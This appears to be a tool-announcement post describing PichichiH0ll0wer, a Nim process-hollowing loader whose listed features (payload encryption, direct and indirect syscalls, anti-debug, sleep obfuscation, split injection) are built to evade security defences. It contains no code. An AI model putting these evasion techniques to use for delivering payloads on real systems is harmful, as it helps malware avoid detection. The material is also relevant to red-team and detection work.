PichichiH0ll0wer: Nim process hollowing loader

by do son · Published · Updated

process hollowing loader

PichichiH0ll0wer

Process hollowing loader written in Nim for PEs only

PichichiH0ll0wer has some features to protect your payload.

Features

  • Configurable builder
  • Payload encrypted and compressed (and optionally splitted) in the hollow loader
  • Supports splitted injection using multiple processes
  • Supports direct and indirect system calls
  • Hollower does not use the very suspicious call Nt/ZwUnmapViewOfSection
  • Can build EXE / DLL hollow loaders
  • Can block unsigned Microsoft DLLs from being loaded to the hollowed process
  • Supports anti-debug techniques with the ability to die or to execute useless calculations (‘troll’ mode)
  • Obfuscated sleep using useless calculations
  • Supports execution within VEH
  • Supports command line Rc4 key to decrypt the payload

Injection methods

  1. Simple hollowing: just the usual stuff: VirtualAlloc -> WriteProcessMemory -> GetThreadContext -> SetThreadContext -> ResumeThread.
  2. Direct syscalls hollowing: using the great NimlineWhispers2.
  3. Indirect syscalls hollowing: using the great NimlineWhispers3.
  4. Splitted hollowing: each step of method (1) is occurring in a separate process with inherited handles.
  5. Splitted hollowing: each step of method (2) is occurring in a separate process with inherited handles.
  6. Splitted hollowing: each step of method (3) is occurring in a separate process with inherited handles.

An example of splitted hollowing of cscript.exe with cmd.exe that spawns whoami.exe:

Install & Use

Copyright (c) 2022 Itay Migdal

Tags: process hollowing loader